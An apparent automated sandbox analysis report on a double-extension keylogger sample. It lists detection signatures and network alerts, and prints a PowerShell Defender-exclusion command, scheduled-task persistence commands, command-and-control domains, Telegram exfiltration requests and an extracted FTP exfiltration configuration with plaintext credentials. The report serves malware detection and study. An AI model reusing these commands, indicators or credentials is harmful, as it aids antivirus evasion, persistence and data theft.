1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ec5a:$s1: UnHook 0x7267a:$s1: UnHook 0x1caf12:$s1: UnHook 0x2ec61:$s2: SetHook 0x72681:$s2: SetHook 0x1caf19:$s2: SetHook 0x2ec69:$s3: CallNextHook 0x72689:$s3: CallNextHook 0x1caf21:$s3: CallNextHook 0x2ec76:$s4: _hook 0x72696:$s4: _hook 0x1caf2e:$s4: _hook
Click to see the 49 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Double Extension File Execution

Source: Process started

Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe", CommandLine: "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe, NewProcessName: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe, OriginalFileName: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe", ProcessId: 5648, ProcessName: GeriOdemeBildirimi942.rar.xlxs.pdf.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe", ParentImage: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe, ParentProcessId: 5648, ParentProcessName: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe", ProcessId: 4048, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SOFcFE" /XML "C:\Users\user\AppData\Local\Temp\tmp1AF7.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SOFcFE" /XML "C:\Users\user\AppData\Local\Temp\tmp1AF7.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\SOFcFE.exe, ParentImage: C:\Users\user\AppData\Roaming\SOFcFE.exe, ParentProcessId: 7376, ParentProcessName: SOFcFE.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SOFcFE" /XML "C:\Users\user\AppData\Local\Temp\tmp1AF7.tmp", ProcessId: 7620, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SOFcFE" /XML "C:\Users\user\AppData\Local\Temp\tmpF6B6.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SOFcFE" /XML "C:\Users\user\AppData\Local\Temp\tmpF6B6.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe", ParentImage: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe, ParentProcessId: 5648, ParentProcessName: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SOFcFE" /XML "C:\Users\user\AppData\Local\Temp\tmpF6B6.tmp", ProcessId: 6912, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe", ParentImage: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe, ParentProcessId: 5648, ParentProcessName: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe", ProcessId: 4048, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SOFcFE" /XML "C:\Users\user\AppData\Local\Temp\tmpF6B6.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SOFcFE" /XML "C:\Users\user\AppData\Local\Temp\tmpF6B6.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe", ParentImage: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe, ParentProcessId: 5648, ParentProcessName: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SOFcFE" /XML "C:\Users\user\AppData\Local\Temp\tmpF6B6.tmp", ProcessId: 6912, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T09:16:29.019175+0200	2803305	3	Unknown Traffic	192.168.2.7	49708	188.114.96.3	443	TCP
2024-10-03T09:16:34.012434+0200	2803305	3	Unknown Traffic	192.168.2.7	49716	188.114.96.3	443	TCP
2024-10-03T09:16:35.738427+0200	2803305	3	Unknown Traffic	192.168.2.7	49719	188.114.96.3	443	TCP
2024-10-03T09:16:41.179897+0200	2803305	3	Unknown Traffic	192.168.2.7	49728	188.114.96.3	443	TCP
2024-10-03T09:16:43.623130+0200	2803305	3	Unknown Traffic	192.168.2.7	49730	188.114.96.3	443	TCP
2024-10-03T09:16:45.677275+0200	2803305	3	Unknown Traffic	192.168.2.7	49732	188.114.96.3	443	TCP
2024-10-03T09:16:48.759459+0200	2803305	3	Unknown Traffic	192.168.2.7	49735	188.114.96.3	443	TCP
2024-10-03T09:16:54.749860+0200	2803305	3	Unknown Traffic	192.168.2.7	49743	188.114.96.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T09:16:27.343805+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49705	193.122.130.0	80	TCP
2024-10-03T09:16:28.390677+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49705	193.122.130.0	80	TCP
2024-10-03T09:16:29.596072+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49709	193.122.130.0	80	TCP
2024-10-03T09:16:31.125066+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49711	193.122.130.0	80	TCP
2024-10-03T09:16:32.281413+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49713	193.122.130.0	80	TCP
2024-10-03T09:16:33.218825+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49715	193.122.130.0	80	TCP
2024-10-03T09:16:35.130195+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49717	132.226.8.169	80	TCP
2024-10-03T09:16:37.734532+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49722	132.226.8.169	80	TCP
2024-10-03T09:16:39.000117+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49721	132.226.8.169	80	TCP
2024-10-03T09:16:40.625110+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49726	132.226.8.169	80	TCP
2024-10-03T09:16:43.078198+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49721	132.226.8.169	80	TCP
2024-10-03T09:16:45.015722+0200	2803274	2	Potentially Bad Traffic	192.168.2.7	49731	132.226.8.169	80	TCP

ETPRO MALWARE SnakeKeylogger Exfil via FTP M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T09:16:15.593851+0200	2845532	1	Malware Command and Control Activity Detected	192.168.2.7	49748	119.18.54.39	21	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://aborters.duckdns.org:8081	URL Reputation: Label: malware
Source: http://anotherarmy.dns.army:8081	URL Reputation: Label: malware

Found malware configuration

Source: 16.2.SOFcFE.exe.4475780.2.raw.unpack

Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "FTP", "Username": "awaratre_log@awaratrendz.com", "Password": "mxH!EyDs(.jx", "FTP Server": "ftp://awaratrendz.com/", "Version": "4.4"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\SOFcFE.exe

ReversingLabs: Detection: 50%

Multi AV Scanner detection for submitted file

Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Virustotal: Detection: 27%			Perma Link
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe	ReversingLabs: Detection: 50%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\SOFcFE.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49706 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49727 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49747 version: TLS 1.2

Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: NRtD.pdbSHA256 source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, SOFcFE.exe.1.dr
Source:	Binary string: NRtD.pdb source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, SOFcFE.exe.1.dr

Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 4x nop then jmp 0116F45Dh	14_2_0116F2C0
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 4x nop then jmp 0116F45Dh	14_2_0116F4AC
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 4x nop then jmp 0116FC19h	14_2_0116F961
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 4x nop then jmp 058A9280h	14_2_058A8FB0
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 4x nop then jmp 058AF13Eh	14_2_058AEE70
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 4x nop then jmp 058A7EB5h	14_2_058A7B78
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 4x nop then jmp 058A18A1h	14_2_058A15F8
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 4x nop then jmp 058A0FF1h	14_2_058A0D48
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 4x nop then jmp 058AE81Eh	14_2_058AE550
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 4x nop then jmp 058AC82Eh	14_2_058AC560
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 4x nop then jmp 058A6733h	14_2_058A6488
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 4x nop then jmp 058A0741h	14_2_058A0498
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 4x nop then jmp 058ADEFEh	14_2_058ADC30
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 4x nop then jmp 058ABF0Eh	14_2_058ABC40
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 4x nop then jmp 058A3709h	14_2_058A3460
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 4x nop then jmp 058A5A29h	14_2_058A5780
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 4x nop then jmp 058AFA5Eh	14_2_058AF790
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 4x nop then jmp 058ADA6Eh	14_2_058AD7A0
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 4x nop then jmp 058ABA7Eh	14_2_058AB7B0
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 4x nop then jmp 058A79C9h	14_2_058A7720
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 4x nop then jmp 058A2A01h	14_2_058A2758
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 4x nop then jmp 058AD14Eh	14_2_058ACE80
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 4x nop then jmp 058A2151h	14_2_058A1EA8
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 4x nop then jmp 058A5179h	14_2_058A4ED0
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 4x nop then jmp 058A48C9h	14_2_058A4620
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 4x nop then jmp 058A7119h	14_2_058A6E70
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 4x nop then jmp 058A1449h	14_2_058A11A0
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 4x nop then jmp 058AECAEh	14_2_058AE9E0
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 4x nop then jmp 058ACCBEh	14_2_058AC9F0
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 4x nop then mov esp, ebp	14_2_058AB089
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 4x nop then mov esp, ebp	14_2_058AB098
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 4x nop then jmp 058AE38Eh	14_2_058AE0C0
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 4x nop then jmp 058AC39Eh	14_2_058AC0D0
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 4x nop then jmp 058A0B99h	14_2_058A08F0
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 4x nop then jmp 058A32B1h	14_2_058A3008
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 4x nop then jmp 058A62D9h	14_2_058A6030
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 4x nop then jmp 058A02E9h	14_2_058A0040
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 4x nop then jmp 058A2E59h	14_2_058A2BB0
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 4x nop then jmp 058A5E81h	14_2_058A5BD8
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 4x nop then jmp 058A25A9h	14_2_058A2300
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 4x nop then jmp 058AF5CEh	14_2_058AF300
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 4x nop then jmp 058AD5DEh	14_2_058AD310
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 4x nop then jmp 058A55D1h	14_2_058A5328
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 4x nop then jmp 058AB5EEh	14_2_058AB320
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 4x nop then jmp 058A7571h	14_2_058A72C8
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 4x nop then jmp 058A6CC1h	14_2_058A6A18
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 4x nop then jmp 058A1CF9h	14_2_058A1A50
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Code function: 4x nop then jmp 058A4D21h	14_2_058A4A78
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 4x nop then jmp 02C3F2EDh	20_2_02C3F3BF
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 4x nop then jmp 02C3F2EDh	20_2_02C3F33C
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 4x nop then jmp 02C3F2EDh	20_2_02C3F150
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 4x nop then jmp 02C3FAA9h	20_2_02C3F7F1
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 4x nop then jmp 06A731E8h	20_2_06A72DD0
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 4x nop then jmp 06A70D0Dh	20_2_06A70B30
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 4x nop then jmp 06A71697h	20_2_06A70B30
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 4x nop then jmp 06A72C21h	20_2_06A72970
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 4x nop then jmp 06A7F8C9h	20_2_06A7F620
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	20_2_06A70673
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 4x nop then jmp 06A7DA61h	20_2_06A7D7B8
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 4x nop then jmp 06A7D1B1h	20_2_06A7CF08
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 4x nop then jmp 06A7E769h	20_2_06A7E4C0
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 4x nop then jmp 06A7DEB9h	20_2_06A7DC10
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 4x nop then jmp 06A731E8h	20_2_06A72DCA
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 4x nop then jmp 06A7F019h	20_2_06A7ED70
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 4x nop then jmp 06A7FD21h	20_2_06A7FA78
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 4x nop then jmp 06A7D609h	20_2_06A7D360
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 4x nop then jmp 06A7E311h	20_2_06A7E068
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	20_2_06A70040
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	20_2_06A70853
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 4x nop then jmp 06A7F471h	20_2_06A7F1C8
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 4x nop then jmp 06A731E8h	20_2_06A73116
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Code function: 4x nop then jmp 06A7EBC1h	20_2_06A7E918

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2845532 - Severity 1 - ETPRO MALWARE SnakeKeylogger Exfil via FTP M1 : 192.168.2.7:49748 -> 119.18.54.39:21

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 119.18.54.39 ports 43366,1,2,32582,47782,21

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 20.2.SOFcFE.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.SOFcFE.exe.4475780.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.SOFcFE.exe.4431b60.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.7:49742 -> 119.18.54.39:43366

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724471%0D%0ADate%20and%20Time:%2003/10/2024%20/%2015:39:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724471%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724471%0D%0ADate%20and%20Time:%2003/10/2024%20/%2021:14:30%0D%0ACountry%20Name:%20%0D%0A%5B%20724471%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org
Source: unknown	DNS query: name: checkip.dyndns.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49711 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49713 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49726 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49705 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49715 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49717 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49709 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49721 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49722 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49731 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49716 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49743 -> 188.114.96.3:443
